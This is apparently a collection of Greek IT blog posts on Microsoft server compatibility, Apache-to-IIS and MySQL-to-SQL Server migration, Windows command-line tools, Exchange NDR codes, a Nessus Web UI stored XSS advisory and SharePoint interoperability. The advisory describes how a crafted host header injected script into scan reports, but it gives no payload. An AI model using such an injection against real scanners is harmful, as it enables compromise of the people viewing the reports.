    Microsoft Operations Manager 2005 Service Pack 1 (SP1)#


    Microsoft Search Server 2008


    Microsoft SQL Server 2005 Service Pack 2 (SP2)


    Microsoft SQL Server 2008


    Microsoft System Center Configuration Manager 2007 Service Pack 1 (SP1)


    Microsoft System Center Data Protection Manager 2007


    Microsoft System Center Essentials 2007 Service Pack 1 (SP1)


    Microsoft System Center Operations Manager Service Pack 1 (SP1)


    Microsoft System Center Virtual Machine Manager


    Microsoft System Center Virtual Machine Manager 2008


    Microsoft System Center Virtual Machine Manager 2008 Beta


    Microsoft Windows Essential Business Server 2008


    Microsoft Windows HPC Server 2008


    Microsoft Windows SharePoint Services 3.0 Service Pack 1 (SP1)


    Microsoft Windows Small Business Server 2008


    Microsoft Windows Small Business Server 2003 R2**


    Microsoft Virtual PC 2007 SP1##


    Microsoft Virtual Server 2005 R2 Service Pack 1 (SP1)


    Microsoft Windows Server Update Services 3.0 Service Pack 1 (SP1)

     

    * Υποστήριξη μόνο για 32bit
    ** Σαν δεύτερο server σε domain 
    *** Δεν συμπεριλαμβάνονται οι Management Server roles

    # Περιέχει υποστήριξη μόνο για clients & agents 
    ## Windows Server 2008 Standard υποστηρίζεται σαν guest λειτουργικό

    ----------------------------------

    Μη συμβατές Microsoft εφαρμογές


    Microsoft BizTalk 2004 and earlier


    Microsoft Commerce Server 2002 and earlier


    Microsoft Compute Cluster Server 2003


    Microsoft Dynamics CRM 3.0 and earlier versions of Microsoft Dynamics CRM


    Microsoft Exchange Server 2003


    Microsoft Forefront Security for Office Communications Server


    Microsoft Forefront Server Security Management Console


    Microsoft Host Integration Server 2004 and earlier


    Microsoft Identity Lifecycle Manager 2007


    Microsoft Internet Security and Acceleration Server 2006 and earlier


    Microsoft Speech Server 2004 R2


    Microsoft SQL Server 2000 and earlier


    Microsoft System Center Reporting Manager 2006


    Microsoft Systems Management Server 2003


    ----------------------

    Εφαμοργές που είναι στο στάδιο προσαρμογής σε Server 2008:


    Microsoft Biztalk Server 2006 R3


    Microsoft Identity Lifecycle Manager 2009


    Microsoft Windows Storage Server 2008

     

    Παρατηρήστε ότι υπάρχουν εφαρμογές 2007 που η ίδια η Microsoft τις έχει εκτός (μέχρι στιγμής), ενώ οι εφαρμογές με τις οποίες ασχολείται τώρα για να τις κάνει πλήρω συμβατές είναι 'brand new'. Οπότε καλό είναι τουλάχιστον στα Microsoft συστήματα να γνωρίζουμε το τι παίζει και το τι δεν παίζει...μέχρι να έχουμε αλλαγές στην λίστα αυτή.

    Εν αναμονή λοιπόν...
  11. Blackman
    Πρόσφατα είχα μία συζήτηση με ένα φίλο που φτιάχνει ιστοσελίδες. Ο συγκεκριμένος τις σελίδες που στήνει χρησιμοποιεί open source εργαλεία και οι σελίδες του γίνονται host σε servers με apache. Οι περισσότεροι που έχετε ασχοληθεί έστω και λίγο με το θέμα και όσοι άλλοι σερφάρετε στο Internet θα έχετε παρατηρήσει ότι η σελίδα που είσαστε είναι πάνω σε Apache (συνήθως τα μικρά γράμματα στο τέλος της σελίδας, μαζί με άλλες πληροφορίες όπως term of use, powered by phpBB κλπ).

    Ο συγκεκριμένος άνθρωπος αποφάσισε μία μέρα να μεταφέρει ολόκληρο το site που είχε σε ένα server σε έναν άλλο ο οποίος ήταν Windows φυσικά και αυτό συνεπάγετε IIS. Όταν με ρώτησε αν γίνετε (λες και είμαι ο Guru του Apache και του IIS) του λέω ότι γίνετε και ότι η διαδικασία δεν είναι καινούρια, αλλά μάλλον λίγο παλιά. Έτσι ανοίγοντας τα ιστορικά τεφτέρια μου, γύρισα στο έτος 2005, όπου ήταν και η ημερομηνία που η Microsoft έβαλε την συγκεκριμένη διαδικασία στο Technet.

    http://technet.microsoft.com/en-us/library/cc780981.aspx

    Εντάξει θα μου πείτε και κάνεις ολόκληρο άρθρο για κάτι που υπάρχει από τότε; Ε ναι... γιατί απλά κατάλαβα ότι αυτό υπάρχει...πόσοι το ξέρουν; Μάλλον ελάχιστοι. Το θέμα όμως που ανέφερα και στον φίλο μου είναι ότι η συγκεκριμένη διαδικασία είναι 'λεπτή' και θέλει μελέτη, ανάλυση και μετά βήμα βήμα υλοποίηση. Όποιος θα προχωρήσει στην συγκεκριμένη διαδικασία θα πρέπει να ακολουθεί κάποια συγκεκριμένα πράγματα όπως είναι ο έλεγχος της συμβατότητας τόσο σε επίπεδο web site, αλλά και σε επίπεδο εφαρμογών που μπορεί να υπάρχουν σε αυτό.

    Η διαδικασία μπορεί να γίνει manually ή μέσω του IIS 6.0 Migration Tool. H Microsoft συνιστά το migration tool, αλλά αν ένα από τα παρακάτω ισχύει στην περίπτωση σας τότε θα πρέπει να το κάνετε manually.


    You have set up programs, installation scripts, or provisioning scripts for the Web sites and applications that you are migrating. When the Web sites and applications that you are migrating have setup programs, installation scripts, or provisioning scripts, use those programs or scripts to install the Web sites and applications on the target server. Ensure that the setup programs, installation scripts, and provisioning scripts have been properly modified to install the Web sites and applications on IIS 6.0.

    The target server is configured to run in IIS 5.0 isolation mode. When the Web sites and applications that you are migrating require the target server to run in IIS 5.0 isolation mode, you must perform the migration manually. To determine whether your Web sites and applications are compatible with worker process isolation mode, see Determining Application Compatibility with Worker Process Isolation Mode earlier in this section.

    The source server has a significant number of FrontPage extended Web sites. When the FrontPage extended Web sites make extensive use of the administrative and publishing security-related settings found in FrontPage 2000 Server Extensions, perform the migration manually. To ensure that these security-related settings are migrated properly to the target server, perform the migration manually and use FrontPage publishing to transfer the Web site to the target server.

    You want to migrate individual virtual directories. When you want to migrate individual virtual directories, perform the migration manually. The IIS 6.0 Migration Tool only moves Web site content and configuration settings at the Web site level, which means that all of the virtual directories beneath the Web site are migrated to the target server.

    To workflow είναι συγκεκριμένο που πρέπει να ακολουθηθεί και ένα από τα πρώτα πράγματα που γίνονται σε αυτές τις περιπτώσεις είναι να γίνει η σωστή προετοιμασία του target server.



    Ο φίλος μου με τον οποίο κάναμε την συζήτηση, απλά είχε ένα WS2003 και ήθελε να κάνει την συγκεκριμένη διαδικασία. Η προετοιμασία δεν είναι κάτι ιδιαίτερο, αλλά πρέπει να είσαστε βέβαιοι ότι τουλάχιστον ο IIS έχει εγκατασταθεί σωστά στο μηχάνημα και δεν βγάζει κάποιο λάθος. Αυτό ειδικά σε μηχανήματα που δεν προέρχονται από clean install. Ειδάλως η όλη διαδικασία μπορεί να μην ολοκληρωθεί ή να βγάλει λάθη.

    Στην περίπτωση που χρησιμοποιήσετε το migration tool τα πράγματα φυσικά είναι και πιο απλά



    Εάν όμως που η παραπάνω διαδικασία πρέπει να γίνει manually, ΒΕΒΑΙΩΘΕΙΤΕ ΟΤΙ ΚΑΝΕΝΑΣ CLIENT ΔΕΝ ΕΙΝΑΙ ΣΥΝΔΕΜΕΝΟΣ ΚΑΙ ΣΥΝΕΠΩΣ ΟΤΙ ΔΕΝ ΥΠΑΡΧΕΙ ΚΑΝΕΝΑ SESSION ΑΝΟΙΚΤΟ ΠΡΟΣ ΤΟ ΣΥΣΤΗΜΑ.

    Στην περίπτωση του φίλου μου η όλη διαδικασία ολοκληρώθηκε με την χρήση του migration tool, αλλά όπως μου είπε, έχει κάποιες περιπτώσεις που θα πρέπει να γίνει manually αν του ζητηθεί ή χρειαστεί migration.

    Ο συγκεκριμένος κάποια στιγμή δεν έβλεπε κάποια πράγματα παρόλο που 'νόμιζε' ότι ολοκλήρωσε την διαδικασία. Αυτό που του έλειπε έιναι το παρακάτω βήμα



    που ουσιαστικά είναι το τελευταίο βήμα πριν την ολοκλήρωσης του migration.

    Οι πρώτες δοκιμές δείχνουν ότι το site έχει μεταφερθεί σωστά, απλά πρέπει να δοκιμαστούν κάποιες εφαρμογές που είχαν στηθεί σε αυτή την σελίδα.

    Όπως και να έχει όμως, διαδικασία για τέτοιου είδους migration υπάρχει και η Microsoft έχει μεριμνήσει για αυτό.

    Όποιος χρειαστεί να κάνει αντίστοιχη κίνηση, να προχωρήσει, αλλά δίνοντας και την απαραίτητη προσοχή.

    ----------------------------------

    Υ.Γ.

    The Apache to IIS 6.0 Migration Tool supports Apache versions 1.3.0–1.3.22, as well as the following Linux distributions:


    Red Hat software (Linux versions 6.0, 6.2, 7.0, 7.1, and 7.2)

    Mandrake Linux (versions 8.0, 8.1, and 8.2)

    SuSE (versions 7.3 and 8.0)

    πλέον είναι και άλλες οι διανομές που υποστηρίζει το συγκεκριμένο εργαλείο, αλλά δεν έχει γίνει σχετική ενημέρωση στην σελίδα στο Technet.

    Για την περίπτωση migration σε IIS σε windows server 2008, θα πρέπει να περιμένετε λίγο. Η διαδικασία θα γίνει σε virtual περιβάλλον την επόμενη εβδομάδα.
  12. Blackman

    Moonwalker…2

    By Blackman,

    Θα μπορούσε να ήταν η νέα ταινία και συνέχεια του γνωστού Moonwalker του εκλιπόντος Michael Jackson, αλλά δεν είναι. Ένα λογοπαίγνιο για την νέα έκδοση του Moonlight για Linux. Σας παραθέτω και την ανακοίνωση που έβγαλε και η ομάδα του project, κάπου στις 17 του περασμένου μήνα, αλλά λόγο εορτών (και full εργασίας) το Blog ήταν κλειστό. (lol)
    We are pleased to announce the availability of Moonlight 2, an open source Linux implementation of Silverlight first announced by Microsoft and Novell in September of 2007. Moonlight is the first and only open source project that provides Linux users access to Silverlight content. Microsoft has provided Novell with access to its test suites for Silverlight, and provides Linux end users of Moonlight with free access to the Microsoft Media Pack, a set of licensed media codecs for video and audio. In addition, Microsoft and Novell are also announcing the expansion of their collaboration on Moonlight to include support for Moonlight implementations of Silverlight 3 and Silverlight 4. As part of the companies’ interoperability agreement, Microsoft will deliver new test suites and specifications for Silverlight 3 and 4 to Novell.
    Το νέο Moonlight είναι φυσικά συμβατό με το Silverlight 2, αλλά εμπεριέχει και μερικά στοιχεία του Silverlight 3 που πρόκειται να βγει, όπως Bitmap APIs, file dialogs, easing functions, pluggable media pipeline και custom Codecs. Η ποιότητα του streaming έχει βελτιωθεί, αλλά αυτό εξαρτάται φυσικά και από την σύνδεση που μπορεί να έχει ο χρήστης. Να επισημάνω επίσης ότι σε αυτή την έκδοση εμπεριέχει και το Mono runtime functionality, όπου οι developers μπορούν να φτιάξουν αρκετά ωραία πράγματα με διάφορες γλώσσες προγραμματισμού.
    Εν αναμονή και του Moonlight 3…
  13. Blackman
    Με αφορμή το σχετικό άρθρο για το Netstat και το πως να εντοπίζουμε κάποιο malware με αυτό τον τρόπο, αποφάσισα να γράψω ένα σχετικό blog post με τις αγαπημένες μου εντολές και την σχετική χρησιμότητα τους

    openfiles : Δείτε λίστα με όλα τα αρχεία που έχουν ανοιχτεί από network users και αποσυνδέστε όποιον θέλετε. Αλλά αν είναι πολλοί πάνω, μάλλον θα έχουμε καθυστερήσεις. Οπότε πολύ όμορφα αν κάποιος έχει συνδεθεί πάνω στο σύστημα σας και βλέπει πράγματα που δεν θέλετε… καταλαβαίνετε.



    fsutil : Οι περισσότεροι την γνωρίζετε. Είναι παρόμοια με την netsh για file system management. Σας επιτρέπει να αλλάξετε την συμπεριφορά ενός file system και διάφορα άλλα. Εντολή που πρέπει να τρέξετε όταν ο υπολογιστής σε κάθε επανεκκίνηση κάνει chkdsk για να δείτε αν ο δίσκος είναι dirty.



    driverquery : Ωραίο εργαλείο με το οποίο βλέπετε αναλυτικά όλους τους εγκατεστημένους drivers στο σύστημα. Τα αποτελέσματα μπορούν να βγουν σε CSV και να τα χρησιμοποιήσετε όπως θέλετε.



    defrag : Defragment μέσω command line.



    systeminfo :Η εντολή που σας δίνει στοιχεία για το τοπικό ή κάποιο απομακρυσμένο μηχάνημα. Πολύ ωραίος τρόπος για να ελέγξεις αν δεν έχει εγκατασταθεί κάποιο fix ή patch. Troubleshooting ή tourblemaking με SYSTEMINFO /S system /U user



    ipconfig – Ένα από τα πιο γνωστά προγράμματα για την διαχείριση προβλημάτων είναι το ipconfig. Μπορείτε να κάνετε release ή renew την δυναμική IP μίας κάρτας, να δείτε ή να καθαρίσετε την cache του DNS και μετά αν ξανακάνετε re-register το όνομα του μηχανήματος στον DNS. Από τα Vista και μετά υπάρχει η υποστήριξη IPv6.



    tasklist and taskkill – Δύο εντολές που έρχονται πακέτο και είναι αρκετά εύκολες στην χρήση. Με taklist /v θα δείτε περισσότερες πληροφορίες. Με το taskkill απλά κλείνετε ότι δεν θέλετε. Ο τρόπος για να γίνει kill μία απλή ή multiple process εφαρμογή, θα πρέπει να χρησιμοποιήσετε το /PID ή το image name /ΙΜ.

    TASKKILL /IM notepad.exe
    TASKKILL /PID 1230 /PID 1241 /PID 1253 /T


    Το καλό της υπόθεσης είναι ότι μπορούν να γίνουν και σε απομακρυσμένο υπολογιστής χρησιμοποιώντας το /S (όνομα συστήματος) και το /U (όνομα χρήστη)



    netstat – Όπως ανέφερα και σε προηγούμενο blog μπορεί ένας χρήστης να μάθει πολλά από αυτή την εντολή για τα connections που έχουν γίνει από και προς το σύστημα σας.



    net command – Από τις πρώτες εντολές που χρησιμοποίησα πολλά πολλά χρόνια πριν. Οι δυνατότητες είναι απλά πάρα πολλές και όλες πολύ χρήσιμες. Δημιουργήστε map network drive με την Net use, ή στείλτε ένα μήνυμα σε κάποιο μηχάνημα με την εντολή NET SEND



    nslookup – Με την χρήση του Internet και του DNS, η ζωή μας έγινε πιο εύκολη για να χρησιμοποιήσουμε φιλικά σε εμάς ονόματα για να συνδεθούμε κάπου. Με το εργαλείο αυτό ελέγχουμε DNS servers και βοηθάει πολύ σε περιπτώσεις troubleshooting. Η nslookup μπορεί να τρέξει είτε σαν interactive ή σαν noninteractive. Η δεύτερη περίπτωση είναι χρήσιμη μόνο όταν ένα και μόνο μέρος data πρέπει να επιστρέψει. Πχ to resovle google.com



    Μερικές χρήσιμές εντολές του nslookup είναι οι εξής:

    set domain (ορίζουμε το default domain για να χρησιμοποιήσει κατά την διαδικασία του resolving, έτσι ώστε να μην χρειάζεται να χρησιμοποιούμε συνέχεια fully qualified name).

    set type (επιλέγουμε τον τύπο του query record που θέλουμε να πάρουμε όπως A, MX, NS)

    server NAME (με αυτή την εντολή δηλώνουμε άλλο server από αυτόν που χρησιμοποιεί το μηχάνημα μας)

    ------------------------------------------------

     

     

     

     

     

     

     

     

     

    Summary Part 1

    Οι παραπάνω εντολές, είναι εντολές που έχω χρησιμοποιήσει κατά καιρούς και με έχουν βοηθήσει. Φυσικά οι περισσότεροι από εδώ μέσα έχετε κάνει χρήση των παραπάνω, αλλά για όσους δεν τις γνωρίζουν είναι ευκαιρία να τις μάθουν. Φυσικά οι παραπάνω εντολές ισχύουν στα συστήματα της Microsoft.

    Αναμένετε την συνέχεια για τις υπόλοιπες εντολές…
  14. Blackman
    Πρόσφατα ένας φίλος με ρώτησε, πως θα μπορούσε να μεταφέρει μία βάση που είχε στημένη σε MySQL, σε μία βάση SQL Server 2008 Express Edition.



    Στην αναζήτηση μου για να βρω λύση στο πρόβλημα του φίλου, θυμόμουν μία διαδικασία integration που μπορείτε να βρείτε στο technet της Microsoft ΕΔΩ.



    Το μοναδικό πρόβλημα στην περίπτωση μας, είναι ότι μιλάμε για SQL 2008. Στην παραπάνω διαδικασία μιλάει για την χρησιμοποίηση του Data Transformation Services (DTS) για να μπορέσει να ολοκληρωθεί το migration, πράγμα που δεν υπάρχει στην περίπτωση του SQL server 2008 (και του SQL 2005 φυσικά). Οπότε ξεκίνησα το ψάξιμο για να δω αν μπορώ να βρω κάτι για να ξεπεράσουμε την όλη διαδικασία και να ολοκληρωθεί το Migration (που σε όλα τα άλλα βήματα, προχώρησε χωρίς πρόβλημα, όπως περιγράφει και η MS).

    Τελικά το αντίστοιχο tool λέγεται SQL Server Integration Services (SSIS), αλλά δεν υπάρχει στην Express έκδοση του SQL. Η λύση είναι η εξής:

    Από το σύστημα που έχουμε εγκατεστημένη την SQL 2008 Express edition πηγαίνετε στην σελίδα http://dev.mysql.com/downloads/connector/odbc/5.1.html και κατεβάζετε τον σχετικό ODBC driver για την MySQL (έκδοση 5.1 στην περίπτωση μας) και στην συνέχεια  χρησιμοποιούμε το παραπάνω για να δημιουργήσουμε ένα Linked Server στον αρχικό MySQL Server που θέλουμε να κάνουμε Migrate. Στην συνέχεια τρέχουμε ένα query το οποίο θα κάνει copy την βάση, πίνακα με πίνακα και το οποίο είναι το εξής:

    (φυσικά αντίστοιχα γράφετε τον όνομα του server σας, της σχετικής βάσης και τα κλασικά username & password)

    EXEC master.dbo.sp_addlinkedserver @server = N'MYSQL', @srvproduct=N'MySQL', @provider=N'MSDASQL', @provstr=N'DRIVER={MySQL ODBC 5.1 Driver}; SERVER=127.0.0.1; DATABASE=Db_NAME; USER=myusername; PASSWORD=mypass; OPTION=3'

    και για να γίνει το copy για ένα πίνακα

    select * into MSSQL_DB_Name.dbo.TableName

    from openquery(MySQL, 'select * from Db_Name.TableName')

    και έτσι ολοκληρώνετε το migration, προχωρώντας και στους υπόλοιπους πίνακες. Φυσικά το παραπάνω ισχύει και στην περίπτωση SQL 2005 Και λογικά δεν θα έχετε πρόβλημα να το τρέξετε και σε άλλη έκδοση πέραν της Express, αλλά αυτό δεν το έχω δοκιμάσει.

    Νομίζω ότι το παραπάνω είναι πολύ χρήσιμο να το γνωρίζετε ότι γίνεται. Έτσι μπορεί να γίνει Migration μίας βάσης από MySQL είτε αυτή είναι σε κάποιο Open Source σύστημα είτε σε κάποιο άλλο.

    DOWNLOADS

    SQL Server 2008 Express Edition

    MySQL ODBC driver

    SQL Server 2005 Express Edition
  15. Blackman
    Με αφορμή ένα thread στο forum και ψάχνοντας για να βρω μία λύση, έπεσα πάνω σε μία ενδιαφέρουσα και όπως το είδα εγώ, πολύ χρήσιμη λίστα για να υπάρχει με σχέση τα NDRs, που έχουμε λάβει όλοι μας κατά καιρούς.

    Το κάθε ndr συνοδεύεται από ένα αριθμό που σε γενικές γραμμές δίχνει το πρόβλημα.

    Σας παραθέτω ότι βρήκα...

     


    NDR List of Codes and their meanings


    NDR
    Code
    Explanation of Non-Delivery Report error codes for Exchange Server 4.2.2 The recipient has exceeded their mailbox limit.  It could also be that the delivery directory on the Virtual server has exceeded its limit. (Default 22 MB) 4.3.1 Not enough disk space on the delivery server.  Microsoft say this NDR maybe reported as out-of-memory error. 4.3.2 Classic temporary problem, the Administrator has frozen the queue. 4.4.1 Intermittent network connection.  The server has not yet responded.  Classic temporary problem.  If it persists, you will also a 5.4.x status code error. 4.4.2 The server started to deliver the message but then the connection was broken. 4.4.6 Too many hops.  Most likely, the message is looping. 4.4.7 Problem with a timeout.  Check receiving server connectors. 4.4.9 A DNS problem.  Check your smart host setting on the SMTP connector.  For example, check correct SMTP format. Also, use square brackets in the IP address [197.89.1.4]  You can get this same NDR error if you have been deleting routing groups. 4.6.5 Multi-language situation.  Your server does not have the correct language code page installed. 5.0.0 SMTP 500 reply code means an unrecognised command.  You get this NDR when you make a typing mistake when you manually try to send email via telnet.
    More likely, a routing group error, no routing connector, or no suitable address space in the connector.  (Try adding * in the address space)
    This status code is a general error message in Exchange 2000.  In fact Microsoft introduced a service pack to make sure now get a more specific code.  

     
    5.1.x Problem with email address. 5.1.0 Often seen with contacts. Check the recipient address. 5.1.1 Another problem with the recipient address.  Possibly the user was moved to another server in Active Directory.  Maybe an Outlook client replied to a message while offline. 5.1.2 SMTP; 550 Host unknown.  An error is triggered when the host name can’t be found.  For example, when trying to send an email to bob@ nonexistantdomain.com.
    [Example kindly sent in by Paul T.] 5.1.3 Another problem with contacts.  Address field maybe empty.  Check the address information. 5.1.4 Two objects have the same address, which confuses the categorizer. 5.1.5 Destination mailbox address invalid. 5.1.6 Problem with homeMDB or msExchHomeServerName - check how many users are affected.  Sometimes running RUS (Recipient Update Service) cures this problem.  Mailbox may have moved. 5.1.7 Problem with senders mail attribute, check properties sheet in ADUC. 5.2.x NDR caused by a problem with the large size of the email. 5.2.1 The message is too large.  Else it could be a permissions problem.  Check the recipient's mailbox. 5.2.2 Sadly, the recipient has exceeded their mailbox limit. 5.2.3 Recipient cannot receive messages this big.  Server or connector limit exceeded. 5.2.4 Most likely, a distribution list or group is trying to send an email.  Check where the expansion server is situated. 5.3.0 Problem with MTA, maybe someone has been editing the registry to disable the MTA / Store driver. 5.3.1 Mail system full.  Possibly a Standard edition of Exchange reached the 16 GB limit. 5.3.2 System not accepting network messages.  Look outside Exchange for a connectivity problem. 5.3.3 Remote server has insufficient disk space to hold email.  Check SMTP log. 5.3.4 Message too big.  Check limits, System Policy, connector, virtual server. 5.3.5 Multiple Virtual Servers are using the same IP address and port. See Microsoft TechNet article: 321721 Sharing SMTP.  Email probably looping. 5.4.0 DNS Problem.  Check the Smart host, or check your DNS. It means that there is no DNS server that can resolve this email address.  Could be Virtual Server SMTP address. 5.4.1 No answer from host.  Not Exchange's fault check connections. 5.4.2 Bad connection. 5.4.3 Routing server failure.  No available route. 5.4.4 Cannot find the next hop, check the Routing Group Connector.  Perhaps you have Exchange servers in different Routing Groups, but no connector. 5.4.6 Tricky looping problem, a contact has the same email address as an Active Directory user.  One user is probably using an Alternate Recipient with the same email address as a contact. 5.4.7 Delivery time-out.  Message is taking too long to be delivered. 5.4.8 Microsoft advise, check your recipient policy. SMTP address should be cp.com. 
    NOT server.cp.com. 5.5.0 Underlying SMTP 500 error.  Our server tried ehlo, the recipient's server did not understand and returned a 550 or 500 error.  Set up SMTP logging. 5.5.2 Possibly the disk holding the operating system is full.  Or could be a syntax error if you are executing SMTP from a telnet shell. 5.5.3 More than 5,000 recipients.  Check the Global Settings, Message Delivery properties. 5.5.5 Wrong protocol version 5.6.3 More than 250 attachments. 5.7.1 Permissions problem.  For some reason the sender is not allowed to email this account.  Perhaps an anonymous user is trying to send mail to a distribution list.
    Check SMTP Virtual Server Access Tab.  Try checking this box: Allow computers which successfully authenticate to relay
    User may have a manually created email address that does not match a System Policy. 5.7.2 Distribution list cannot expand and so is unable to deliver its messages. 5.7.3 Check external IP address of ISA server. Make sure it matches the SMTP publishing rule. 5.7.4 Extra security features not supported.  Check delivery server settings 5.7.5 Cryptographic failure.  Try a plain message with encryption. 5.7.6 Certificate problem, encryption level maybe to high. 5.7.7 Message integrity problem.
    Ελπίζω να φανεί χρήσιμο.

    Y.Γ. Η λίστα είναι για Exchange 2003, στην περίπτωση του 2007, αλλάζει ελάχιστα στην επεξήγηση, προφανώς δεν παραθέτω την αντίστοιχη λίστα για 2007 γιατί μιλάμε για σχεδόν ίδιο πράγμα
  16. Blackman
    Όλοι μας είμαστε λίγο πολύ εξοικειωμένοι με το Nessus.
    Αυτοί που δεν γνωρίζουν, το Nessus Vulnerability Scanner της
    Tenable Network Security είναι μία εφαρμογή που δουλειά της
    είναι να ελέγχει το δίκτυο και να αναφέρει το πόσο ευάλωτο
    είναι το κάθε σύστημα στις επιθέσεις, εμφανίζοντας μία πληθώρα
    από πληροφορίες όπως το ποιες πόρτες είναι ανοιχτές και διάφορα άλλα.
     
     
     
    The Situation
     
     
     
    Το Nessus έχει ένα server που τρέχει και στον οποίο δίνουμε τα αιτήματα
    μας για τις αναζητήσεις μας. Για να το εκτελέσουμε μπορούμε να
    χρησιμοποιήσουμε είτε την client εφαρμογή ή το WEB UI.
     
     
     
    Αρχές του καλοκαιριού ο φίλτατος Frank Lycops από το The Security Factory,
    βρήκε ότι το web-based user interface ήταν ευάλωτο σε επίθεση XSS (Cross Site Scripting).
     
    Συγκεκριμένα όπως αναφέρει η ίδια η Nessus τέλος Αυγούστου:
     
    The Nessus scanner's web-based user interface (Web UI) was vulnerable to
    a stored cross-site scripting (XSS) attack. The issue was due to a security
    control being briefly removed due to a regression error. During this 48
    hour window, one new build of the Web UI was released leading to the ability
    to inject arbitrary script code. This could be done by setting up a malicious
    web server that returned a crafted host header containing JavaScript.
    When Nessus scanned the web server, the input would be passed as-is and
    render when viewing a report.
     
    Proof Of Concept


    Λύση
     
    Η λύση είναι απλή. Η Tenable διόρθωσε το πρόβλημα στην επόμενη έκδοση, συνεπώς όσοι έχετε εγκατεστημένη την έκδοση με Web UI verson 2.3.3, αναβαθμήστε στην 2.3.4 του Web UI.
     
    πηγές:
    http://www.exploit-db.com/exploits/34929/
    http://www.tenable.com/security/tns-2014-08
    http://www.thesecurityfactory.be/permalink/nessus-stored-xss.html
  17. Blackman
    Δεν ξέρω πόσοι από εδώ μέσα γνωρίζετε ή έχετε επαφή με το Microsoft Office SharePoint Server 2007, αλλά οι περισσότεροι καταλαβαίνετε για τι πράγμα μιλάμε. Το SharePoint στις προηγούμενες εκδόσεις του έδειξε τα δόντια του και η τελευταία έκδοση του ήρθε πιο ολοκληρωμένη από ποτέ. Εντάξει, θα μου πείτε, ότι αυτό που αναφέρω δεν είναι κάτι νέο για όσους παρακολουθούν την εξέλιξη του προϊόντος.<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />





     



    Πόσοι γνωρίζετε όμως ότι το νέο SharePoint είναι στημένο έτσι, ώστε να μπορεί να αντλήσει πληροφορίες από μία μεγάλη γκάμα εξωτερικών προγραμμάτων 3ων κατασκευαστών; Νομίζω, ότι η Microsoft με το SharePoint Server πραγματικά έδωσε ξεχωριστή έννοια στην λέξη "Interoperability". Το σύστημα μέσα σε όλα προσφέρει κεντρική διαχείριση στο τμήμα ΙΤ μέσω μίας ενιαίας πλατφόρμας διαχείρισης, την ίδια στιγμή που προσφέρει του developers όλα τα απαραίτητα εργαλεία για γρήγορη ανάπτυξη εφαρμογών.


    Σκοπός της Microsoft για να επιτύχει το interoperability με το Office SharePoint Server 2007 ήταν να κάνει δυνατό για τους χρήστες να έχουν συγκεντρωμένη την πληροφορία σε ένα σύστημα από μία γκάμα διαφορετικών πηγών(data sources) και εφαρμογών, ώστε ο χρήστης μετά να έχει διαθέσιμη και να μπορεί να χρησιμοποιήσει αυτή την πληροφορία μέσω ενός πιο οικείου περιβάλλοντος.


    Τα βασικά σενάρια που καλύπτει το SharePoint Server 2007 στο κομμάτι του Interoperability είναι τα εξής:



    Integration with Business Solutions, enabling rich access and presentation of data managed in other systems.

    Enterprise Search, for indexing and full-text search on all business data (entity instances) from databases and back-end server applications such as SAP, Siebel and Lotus Notes applications.

    Composite applications, business dashboards and mashups, where a new business capability is created by assembling multiple existing software assets: Web services, APIs, Web feeds (e.g., RSS or Atom), gadgets, and screen scraping.

    Τεχνολογίες Interoperability:


    Single Sign-on :


    To Office SharePoint Server 2007 προσφέρει ένα default single sign-on (SSO) σύστημα για την σύνδεση με third-part ή back-end συστήματα. Χμ... υπάρχει 'ψωμί' εδώ είναι η πρώτη σκέψη που περνάει από το μυαλό. 'Τι μας λες ρε Blackman;' είναι τα πρώτα που φαντάζομαι ότι κάποιος σκέφτεται αυτή την στιγμή που διαβάζει αυτές τις γραμμές. Και όμως... το SSO επιτρέπει στους χρήστες εύκολη πρόσβαση στο LOB (line-of-business) σύστημα μετά την είσοδο τους στην σελίδα του Portal. Το SSO το επιτυγχάνει αυτό προσφέροντας μία credential-mapping βάση δεδομένων που φυσικά είναι encrypted. Αυτό το credential mapping δουλεύει επίσης και για groups του Active Directory, ώστε και τα μέλη κάθε group να έχουν την εμπειρία αυτής της 'εύκολης' πρόσβασης. Επίσης το SSO προσφέρει και τα απαραίτητα μέσα για custom Web Parts και άλλα services του SharePoint Services 2007 όπως τα Business Data Catalog, Excel Services και InfoPath Forms Services για να 'τραβάει' τα credentials του χρήστη που χρειάζεται για την πρόσβαση όποιου back-end συστήματος.


    Business Data Catalog (webcast link) :


    Το Business Data Catalog είναι μία νέα δυνατότητα Integration του SharePoint Server 2007. Είναι ένα service που δίνει την δυνατότητα στον SharePoint Server να αντλήσει δεδομένα από back-end server εφαρμογές χωρίς να χρειάζεται η χρήση custom κώδικα για να επιτευχθεί η διασύνδεση μεταξύ αυτών των εφαρμογών και του SharePoint Server, αλλά ούτε και για την άντληση όποιας πληροφορίας. Ουσιαστικά αυτό που κάνει το Business Data Catalog service είναι να γεφυρώνει το κενό μεταξύ του Portal Site σας και της business εφαρμογής που μπορεί να χρησιμοποιείται στην εταιρεία σας, με αποτέλεσμα να έχετε όλη την απαραίτητη πληροφορία από το τρίτο σύστημα στο Sharepoint.


    Το συγκεκριμένο σύστημα προσφέρει επιπλέον ένα component το οποίο μπορεί και διαβάζει metadata από το back-end σύστημα και να το μετατρέπει σε μία συγκεκριμένη μορφή μέσα στο Sharepoint. Πολύ όμορφα, το οποίο γίνεται ακόμα πιο όμορφο αν μάθετε ότι η συνδεσιμότητα με παραδοσιακά line-of-business συστήματα επιτυγχάνετε με απλά Web services, ενώ η συνδεσιμότητα με βάσεις δεδομένων γίνεται με χρήση ADO.NET!


    Splendid…


    WSRP Consumer and iView Web Parts :


    Το Sharepoint μπορεί να εμφανίζει πληροφορίες και από άλλα portal συστήματα με την χρήση των WSRP consumer and iView Web Parts. Αυτά τα εξειδικευμένα web parts τραβούν την πληροφορία και την δομή εφαρμογών άλλων portals, διατηρώντας την λειτουργικότητα και την ευκολία χρήσης που πρόσφερε το αρχικό portal.


    WSRP σημαίνει Web Services for Remote Portlets, και το οποίο είναι ένα στάνταρντ που δημιούργησε η OASIS και το οποίο επιτρέπει σε ένα portal να επαναχρησιμοποιήσει portlets remotely. Τα iViews είναι self-contained Web documents και τα οποία διαχειρίζονται από SAP portal framework.



     

    WSRP Toolkit for SharePoint :


    Σε συνέχεια του προηγούμενο έρχεται το σχετικό toolkit, με το οποίο ο χρήστης μπορεί να δημιουργήσει εύκολα διάφορες λύσεις και μετά να επαναχρησιμοποιήσει αυτό το υλικό σε Java-based portals. Εργαλείο μάλλον, χρήσιμο για developers.


    IFilters for Search :


